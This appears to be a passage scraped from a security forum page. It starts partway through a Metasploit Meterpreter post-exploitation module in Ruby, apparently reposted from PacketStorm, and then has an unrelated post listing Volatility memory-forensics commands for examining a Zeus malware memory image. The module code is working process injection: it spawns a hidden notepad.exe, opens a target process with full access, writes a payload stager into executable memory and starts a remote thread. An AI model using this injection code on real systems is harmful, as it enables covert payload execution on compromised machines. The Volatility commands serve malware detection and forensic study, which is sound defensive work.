=~ /x86/ cmd = "#{windir}\\System32\\notepad.exe" elsif @payload_arch.first == "x86_64" and client.platform =~ /x64/ cmd = "#{windir}\\System32\\notepad.exe" elsif @payload_arch.first == "x86_64" and client.platform =~ /x86/ cmd = "#{windir}\\Sysnative\\notepad.exe" elsif @payload_arch.first == "x86" and client.platform =~ /x64/ cmd = "#{windir}\\SysWOW64\\notepad.exe" end begin proc = client.sys.process.execute(cmd, nil, {'Hidden' => true }) rescue Rex::Post::Meterpreter::RequestError return nil end return proc.pid end def inject_into_pid(pid) vprint_status("Performing Architecture Check") return if not arch_check(pid) begin print_status("Preparing '#{@payload_name}' for PID #{pid}") raw = payload.generate print_status("Opening process #{pid.to_s}") host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) if not host_process print_error("Unable to open #{pid.to_s}") return end print_status("Allocating memory in procees #{pid}") mem = host_process.memory.allocate(raw.length + (raw.length % 1024)) # Ensure memory is set for execution host_process.memory.protect(mem) print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager") print_status("Writing the stager into memory...") host_process.memory.write(mem, raw) host_process.thread.create(mem, 0) print_good("Successfully injected payload in to process: #{pid}") rescue Rex::Post::Meterpreter::RequestError => e print_error("Unable to inject payload:") print_line(e.to_s) end end end Source: PacketStorm
  25. Praetorian503
    Description: In this video I will show you Commands of Volatility Framework for Malware and Rootkit analysis Commands list ./vol.py –f zeus.vmem pslist To list the processes of a system, use the pslist command. ./vol.py –f zeus.vmem malfind You can use it to find hidden or injected code/DLLs in user mode memory ./vol.py –f zeus.vmem ldrmodules To find out the hidden dll ./vol.py –f zeus.vmem apihooks To find API hooks in user mode or kernel mode ./vol.py –f zeus.vmem idt IDT (Interrupt Descriptor Table) ./vol.py –f zeus.vmem gdt Gdt (Global Descriptor Table) ./vol.py –f zeus.vmem threads –L The command gives you extensive details on threads ./vol.py –f zeus.vmem callbacks Callbacks for detecting Windows kernel use of these callbacks to monitor and/or react to events. ./vol.py –f zeus.vmem driverirp To print a driver's IRP Major Function table ./vol.py –f zeus.vmem devicetree Windows uses a layered driver architecture ./vol.py –f zeus.vmem psxview This plugin helps you detect hidden processes. Source : - Wiki Pages - volatility - An advanced memory forensics framework - Google Project Hosting Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Volatility - Malware And Rootkits Command Usage
×
×
  • Create New...